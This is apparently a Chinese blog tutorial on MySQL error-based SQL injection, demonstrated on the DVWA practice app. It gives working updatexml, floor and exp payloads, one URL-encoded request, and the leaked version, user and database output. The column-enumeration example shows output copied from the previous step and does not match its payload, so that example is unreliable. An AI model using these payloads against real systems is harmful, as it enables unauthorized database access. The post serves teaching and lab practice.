首页 web安全

Mysql报错注入主要的方法有updatexml,floor和exp

1. updatexml

updatexml报错原理从本质上讲,就是函数的报错

mysql> select updatexml(1,concat(0x7e,(select version()),0x7e),1);
ERROR 1105 (HY000): XPATH syntax error: '~8.0.20~'

1.1 实验

打开dvwa,通过sql注入的实例,通过上面的案例,可以显示mysql的版本号,

XPATH syntax error: '~5.5.47-0ubuntu0.14.04.1~'

可以更改相应的payload实现相应的功能

如显示当前数据库名称的payload

http://localhost/vulnerabilities/sqli/?id=1%27+union+select+1%2Cupdatexml%281%2Cconcat%280x7e%2C%28select+database%28%29%29%2C0x7e%29%2C1%29%23&Submit=Submit#

2. floor

简单来说,floor报错原理是rand和order by或者group by的冲突,具体可以查看Mysql文档

2.1 爆破数据库版本信息

1' and(select 1 from (select count(*),concat((select (select (select concat(0x7e,version(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23

回显:

Duplicate entry '~5.5.47-0ubuntu0.14.04.1~1' for key 'group_key'

d0eJpD.png

2.2 爆破当前用户

1' and(select 1 from (select count(*),concat((select (select (select concat(0x7e,user(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#

回显:

Duplicate entry '~admin@localhost~1' for key 'group_key'

2.3 爆破当前使用的数据库

1' and(select 1 from (select count(*),concat((select (select (select concat(0x7e,database(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#

回显:

Duplicate entry '~dvwa~1' for key 'group_key'

爆破指定表的字段

1' and(select 1 from (select count(*),concat((select (select (select concat(0x7e,column_name,0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#

回显:

Duplicate entry '~dvwa~1' for key 'group_key'

3.exp

exp函数报错,exp()本质原因是溢出报错,我们可以使用以下payload:

3.1查看当前musql用户

id=1' and exp(~(select * from (select user())x))#

回显:

DOUBLE value is out of range in 'exp(~((select 'admin@localhost' from dual)))'

d0niGT.png




文章评论